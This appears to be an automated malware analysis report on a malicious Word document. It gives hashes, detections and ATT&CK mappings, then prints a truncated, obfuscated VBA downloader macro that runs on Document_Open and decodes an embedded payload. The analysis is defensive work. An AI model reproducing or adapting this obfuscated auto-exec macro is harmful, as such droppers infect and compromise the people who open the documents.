Office (OLE) malware analysis — malicious · d39dd0d601b8a3f3

MALICIOUS

Office (OLE)

171.0 KB Created: 2018-05-31 13:14:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 4e3ac25378dbd5d33ed5abd050ffca86 SHA-1: eeaf4effb3abb793f29870dfe9fb1e62eec5c8d9 SHA-256: d39dd0d601b8a3f32c79734fd35322fb2df58a710716409d05e2721ef6a391ca

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and VBA p-code auto-execution further supports this. The VBA script itself is heavily obfuscated with complex arithmetic operations and loops, making its exact payload difficult to determine, but its structure strongly suggests it's designed to download and execute a secondary malicious file.

Heuristics 5

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11371 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11371 bytes
SHA-256: `576dc1194c588a1298a0c035558fa69c13a5f38afe7fe941c73681ad5038df45`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim stairwell As Long Dim torr As Byte sashimi prolusion = 21 + 32 Pmt 0, prolusion, 35671, 43112, 6 End Sub Attribute VB_Name = "algolagnic" Function semite() Dim dicksonia(255) As Byte pseudemys = 67 - 41 + 39 For i = pseudemys To (117 - 26 + 0) dicksonia(pseudemys) = pseudemys - (14 - 45 + 96) pseudemys = pseudemys + 1 If (117 - 5 - 21) < pseudemys Then bookful = exogamy + 60 - 59 + 64 Exit For End If anywhere = cates + 77 - 116 + 104 Next pseudemys = (86 - 69 + 31) For i = pseudemys To (77 - 75 + 56) dicksonia(pseudemys) = pseudemys + (56 - 101 + 49) pseudemys = pseudemys + 1 If (105 - 70 + 23) < pseudemys Then posthaste = beneficed + 44 - 96 + 117 Exit For End If accelerate = aphony + 93 - 83 + 55 Next pseudemys = (22 - 110 + 185) For i = pseudemys To (84 - 85 + 124) dicksonia(pseudemys) = pseudemys - (15 - 14 + 70) pseudemys = pseudemys + 1 apposition = narthex + 108 - 39 - 4 If (78 - 67 + 112) < pseudemys Then bushed = northnorthwest + 110 - 26 - 19 Exit For End If runway = convinced + 88 - 95 + 72 Next dicksonia(123 - 17 - 59) = (31 - 14 + 46) pseudemys = (91 - 2 - 46) dicksonia(pseudemys) = (2 - 94 + 154) semite = dicksonia End Function Function gengr(achenial) gengr = AscW(achenial) End Function Function dismask(markup, frugally, ominous) Select Case ominous Case 31 + (10 / 2 - 5) dismask = markup \ frugally Case 41 + (5 - 3) / 2 - 1 dismask = markup And frugally Case 49 + (56 / 7 - 4 * 2) dismask = markup * frugally End Select End Function Function agglomeration(cryptogamia) As String Dim manta As Integer Dim boron As Long Dim expressman(6962) As Byte Dim duffer As Long Dim dishpan(63) As Long Dim versed As Long Dim motherinlaw(63) As Long Dim vizor As Long Dim terrorist() As Byte Dim enclosure(63) As Long honeymoon = "sneeringly" Dim magnificat As String verandah = 29 - 83 + 309 russet = 103 - 126 + 4119 grasseating = 23 - 78 + 16711735 placatingly = 108 - 55 + 262091 Dim tannin As String ungrasped = 33 - 21 + 52 myeloma = 115 - 103 + 4020 arietation = 3 - 128 + 65661 omsk = 95 - 3 + 65188 regally = 37 - 66 + 258077 Dim corporality As Byte miscegenate = 105 - 115 + 266 anil = 100 - 82 + 45 Dim pothunter As Variant succeeding = 107 - 89 + 16515054 Dim ecstasis As Variant binocular = 118 - 87 + 7812 Dim eddy() As Byte eddy = VBA.StrConv(cryptogamia, 120 + 8) helve = 53 + 1 Pmt 0, helve, 33779, 53282, 4 crusher = 7843 adrolepsy = vbKeyShift - 12 For athapaskan = 0 To crusher If athapaskan Mod 2 = 0 Then eddy(athapaskan) = eddy(athapaskan) - adrolepsy Else eddy(athapaskan) = eddy(athapaskan) - (adrolepsy - 1) End If Next athapaskan bantamcock = 23 + 23 Pmt 0, bantamcock, 11888, 50720, 4 manta = 0 arab = semite For duffer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) dishpan(duffer) = dismask(duffer, ungrasped, 49) motherinlaw(duffer) = dismask(duffer, russet, 49) enclosure(duffer) = dismask(duffer, placatingly, 49) Next duffer loaf = 39 + 10 Pmt 0, loaf, 26984, 58453, 2 terrorist = eddy sarcostemma = 115 - 122 + 11 pyrrhus = 44 + 27 Pmt 0, pyrrhus, 28780, 13181, 2 dasyurus = 81 - 3 - 75 actinidia = mimium / 303 abysm = honeymoon anagogic = dasyurus + 1 gladly = 109 - 123 + 16 For vizor = 0 To crusher inexcitable = terrorist(vizor) anaphrodisiac = terrorist(vizor + 2) downtoearth = motherinlaw(arab(terrorist(vizor + 1))) aired = dishpan(arab(anaphrodisiac)) + arab(terrorist(vizor + dasyurus)) versed = enclosure(arab(inexcitable)) + downtoearth + aired duffer = dismask(versed, grasseating, 41) expressman(boron) = dismask(duffer, arietation, 31) duffer = dismask(versed, omsk, 41) expressman(boron + 1) = dismask(duffer, miscegenate, 31) expressman(boro ... (truncated)

SHA-256: 576dc1194c588a1298a0c035558fa69c13a5f38afe7fe941c73681ad5038df45

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
Dim stairwell As Long
Dim torr As Byte
sashimi
prolusion = 21 + 32
Pmt 0, prolusion, 35671, 43112, 6
End Sub


Attribute VB_Name = "algolagnic"
Function semite()
Dim dicksonia(255) As Byte
pseudemys = 67 - 41 + 39
For i = pseudemys To (117 - 26 + 0)
dicksonia(pseudemys) = pseudemys - (14 - 45 + 96)
pseudemys = pseudemys + 1
If (117 - 5 - 21) < pseudemys Then
bookful = exogamy + 60 - 59 + 64
Exit For
End If
anywhere = cates + 77 - 116 + 104
Next
pseudemys = (86 - 69 + 31)
For i = pseudemys To (77 - 75 + 56)
dicksonia(pseudemys) = pseudemys + (56 - 101 + 49)
pseudemys = pseudemys + 1
If (105 - 70 + 23) < pseudemys Then
posthaste = beneficed + 44 - 96 + 117
Exit For
End If
accelerate = aphony + 93 - 83 + 55
Next
pseudemys = (22 - 110 + 185)
For i = pseudemys To (84 - 85 + 124)
dicksonia(pseudemys) = pseudemys - (15 - 14 + 70)
pseudemys = pseudemys + 1
apposition = narthex + 108 - 39 - 4
If (78 - 67 + 112) < pseudemys Then
bushed = northnorthwest + 110 - 26 - 19
Exit For
End If
runway = convinced + 88 - 95 + 72
Next
dicksonia(123 - 17 - 59) = (31 - 14 + 46)
pseudemys = (91 - 2 - 46)
dicksonia(pseudemys) = (2 - 94 + 154)
semite = dicksonia
End Function
Function gengr(achenial)
gengr = AscW(achenial)
End Function
Function dismask(markup, frugally, ominous)
Select Case ominous
Case 31 + (10 / 2 - 5)
dismask = markup \ frugally
Case 41 + (5 - 3) / 2 - 1
dismask = markup And frugally
Case 49 + (56 / 7 - 4 * 2)
dismask = markup * frugally
End Select
End Function
Function agglomeration(cryptogamia) As String
Dim manta As Integer
Dim boron As Long
Dim expressman(6962) As Byte
Dim duffer As Long
Dim dishpan(63) As Long
Dim versed As Long
Dim motherinlaw(63) As Long
Dim vizor As Long
Dim terrorist() As Byte
Dim enclosure(63) As Long
honeymoon = "sneeringly"

Dim magnificat As String
verandah = 29 - 83 + 309
russet = 103 - 126 + 4119
grasseating = 23 - 78 + 16711735
placatingly = 108 - 55 + 262091
Dim tannin As String

ungrasped = 33 - 21 + 52
myeloma = 115 - 103 + 4020
arietation = 3 - 128 + 65661
omsk = 95 - 3 + 65188
regally = 37 - 66 + 258077
Dim corporality As Byte

miscegenate = 105 - 115 + 266
anil = 100 - 82 + 45
Dim pothunter As Variant

succeeding = 107 - 89 + 16515054
Dim ecstasis As Variant
binocular = 118 - 87 + 7812
Dim eddy() As Byte
eddy = VBA.StrConv(cryptogamia, 120 + 8)
helve = 53 + 1
 Pmt 0, helve, 33779, 53282, 4

crusher = 7843
adrolepsy = vbKeyShift - 12
For athapaskan = 0 To crusher
If athapaskan Mod 2 = 0 Then
eddy(athapaskan) = eddy(athapaskan) - adrolepsy
Else
eddy(athapaskan) = eddy(athapaskan) - (adrolepsy - 1)
End If
Next athapaskan
bantamcock = 23 + 23
 Pmt 0, bantamcock, 11888, 50720, 4

manta = 0
arab = semite
For duffer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
dishpan(duffer) = dismask(duffer, ungrasped, 49)
motherinlaw(duffer) = dismask(duffer, russet, 49)
enclosure(duffer) = dismask(duffer, placatingly, 49)
Next duffer
loaf = 39 + 10
 Pmt 0, loaf, 26984, 58453, 2

terrorist = eddy
sarcostemma = 115 - 122 + 11
pyrrhus = 44 + 27
 Pmt 0, pyrrhus, 28780, 13181, 2

dasyurus = 81 - 3 - 75
actinidia = mimium / 303

abysm = honeymoon

anagogic = dasyurus + 1
gladly = 109 - 123 + 16
For vizor = 0 To crusher
inexcitable = terrorist(vizor)
anaphrodisiac = terrorist(vizor + 2)
downtoearth = motherinlaw(arab(terrorist(vizor + 1)))
aired = dishpan(arab(anaphrodisiac)) + arab(terrorist(vizor + dasyurus))
versed = enclosure(arab(inexcitable)) + downtoearth + aired
duffer = dismask(versed, grasseating, 41)
expressman(boron) = dismask(duffer, arietation, 31)
duffer = dismask(versed, omsk, 41)
expressman(boron + 1) = dismask(duffer, miscegenate, 31)
expressman(boro
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.